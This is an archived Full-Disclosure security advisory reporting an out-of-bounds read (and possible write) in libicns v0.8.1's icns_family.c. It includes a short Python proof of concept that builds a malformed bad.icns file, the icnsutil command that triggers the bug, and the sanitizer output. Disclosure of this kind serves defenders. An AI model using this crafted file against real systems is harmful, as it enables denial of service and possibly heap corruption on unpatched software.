lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAFmK-GyYqQKqNZv9CTsddAJkw82Tr5+8iwc3VfC8xStPhzP5wA@mail.gmail.com>
Date: Thu, 11 Sep 2025 03:19:08 -0400
From: Ron E <ronaldjedgerson@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] libicns v0.8.1 Out-of-Bounds Read in libicns icns_family.c
 when parsing malformed .icns files

libicns fails to validate element size fields in .icns files properly. A
crafted file can cause the library to allocate insufficient memory for an
icns_family_t structure. When icns_family.c treats this undersized memory
as a complete struct, it dereferences members that lie beyond the allocated
space. This results in an Out-of-Bounds Read (CWE-125). Depending on
subsequent code paths, these invalid member references may also be written
to, escalating to an Out-of-Bounds Write (CWE-787).

*Impact:*

   - Out-of-Bounds Read → crash (Denial of Service).
   - If invalid struct members are later updated, this may cause
   Out-of-Bounds Write and heap corruption.
   - With controlled heap layouts, an attacker could leverage the writes
   for arbitrary code execution.



*Proof of Concept:*

Save as bad.icns:
---

*i*mport struct


data  = b'icns'

data += struct.pack('>I', 32)       # fake file size

data += b'ic07'                     # 128x128 ARGB type

data += struct.pack('>I', 16)       # bogus element size

data += b'\xff' * 8                 # filler


open('bad.icns','wb').write(data)

----

./icnsutil -c icns -o out.png bad.icns


*Output:*
icns_family.c:58:2: runtime error: member access within address
0x502000000030 with insufficient space for an object of type
'icns_family_t' (aka 'struct icns_family_t') 0x502000000030: note: pointer
points here 00 00 00 00 be be be be be be be be 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ